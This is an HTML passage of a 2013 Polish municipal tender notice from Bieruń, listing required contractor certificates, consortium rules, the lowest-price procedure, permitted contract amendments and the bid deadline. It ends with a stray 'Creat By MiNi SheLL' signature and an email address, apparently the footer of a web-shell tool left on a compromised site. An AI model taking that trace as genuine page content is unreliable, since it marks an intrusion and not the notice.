<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1.	Oświadczenie z art. 22 ust. 1 ustawy pzp, że :
1.	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  
       nakładają obowiązek posiadania takich uprawnień;
2.	posiada wiedzę i doświadczenie do wykonania zamówienia; 
3.	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
 Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć pełnomocnictwo (ciąg pełnomocnictw), w formie oryginału lub notarialnie poświadczonej kopii. 
Uwaga:
1) Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt. A Lista wymaganych oświadczeń   
       oraz  w pkt. B Lista wymaganych dokumentów.
       Zamiast dokumentów, o których mowa w punktach  3, 4 i 5 Listy wymaganych dokumentów 
       przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
       zamieszkania, potwierdzające odpowiednio, że:
       a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
       b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne 
           albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
           płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
       c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
Dokumenty, o których mowa powyżej, z wyjątkiem dokumentu z pkt 1a) powinny być wystawione 
nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
       Dokument z pkt 1 a), powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem    
       terminu składania ofert.
       Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je
       dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem    
       sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
       odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania.
       Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentów, o których mowa w pkt 1
        niniejszej uwagi.
      2)  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
      3)   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku  
   podmiotów , o których mowa w § 1 ust.2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów  są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
    4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach          zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
       Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego,
         -  czego dotyczy zobowiązanie,
         -  w jaki sposób będzie zobowiązanie wykonane przy realizacji zamówienia,
         -  jakiego okresu dotyczy zobowiązanie.
     5) Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku.
     6) Podmioty występujące wspólnie
         W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/  
       spółki cywilnej) do oferty należy dołączyć: 
a)	Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika (lidera), 
jego zakresu działania i uprawnień do reprezentowania wykonawców w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 
Pełnomocnictwo  winno zawierać, w szczególności:
- nazwy wszystkich wykonawców  wspólnie ubiegający się o realizację zamówienia  
i udzielających pełnomocnictwa, 
- nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy, 
- czas trwania ( zawiązania umowy wykonawców wspólnie ubiegających się o udzielenie 
   zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
- cel zawarcia ( wspólny udział w przetargu i wspólna realizacja zamówienia publicznego),
- datę udzielenia pełnomocnictwa,
- podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,    
  zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. 
Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem/Liderem. 
   b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby warunki ,                 
       o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie.
   c) Dokumenty wymienione w pkt. V B ppkt. 1, 2 i 6 Listy wymaganych dokumentów  powinny być     
       złożone w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący 
       wspólnie spełnili łącznie.
       d) Dokumenty wymienione w pkt. V B ppkt. 3,4,5 i 7 Listy wymaganych dokumentów składa każdy                     
            z wykonawców wchodzących w skład podmiotu występującego wspólnie.
       e) Kopie dokumentów dotyczących wykonawcy powinny być poświadczone za zgodność z oryginałem przez wykonawcę, którego dokument dotyczy lub przez pełnomocnika lub przez wykonawców wchodzących w skład tego podmiotu.
       f)  Zgodnie z art. 141 ustawy pzp, wykonawcy wspólnie ubiegający się o udzielenie zamówienia    
            ponoszą solidarną odpowiedzialność za wykonanie umowy.
Do oferty zaleca się załączyć informacje  w zakresie części zamówienia, które zostaną 
powierzone podwykonawcom. W przypadku braku złożenia informacji w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia sam bez powierzenia części zamówienia podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w zakresie:
1)  wartości umownej:
     a) w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie                  
         z obowiązującą stawką;
b) w przypadku zmian ilości wykonanych robót, a wynikających z rozliczenia kosztorysowego 
    robót ( ryczałtowo-ilościowego);

2)  zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem  
     wymagań określonych w SIWZ, jakie osoby te powinny spełniać; 
            3)  zmiany terminu rozpoczęcia lub zakończenia wykonania przedmiotu umowy, w szczególności:
                  a)  z powodu niesprzyjających warunków atmosferycznych( gradobicie, gwałtowne opady,    
       powodzie i inne anomalia klimatyczne),
                  b) zmiany przepisów, okoliczności, których nie można było przewidzieć przy                 
      udzielaniu zamówienia, 
                  c) siły wyższej, 
                  d) wystąpienia środków ochrony prawnej w postępowaniu o zamówienie publiczne,
4)  mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana       
     powszechnie obowiązujących przepisów prawa; 
5)  zmiany Podwykonawcy lub powierzenia Podwykonawcy części zakresu zamówienia  
     w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie 
     sporządzania oferty; 
6)   zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie 
      wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych, pokój nr 15, II piętro, segment A, 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2013 godzina 10:00, miejsce: Urząd Miejski w Bieruniu - Sekretariat, pokój nr 9, I piętro, segment A, 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com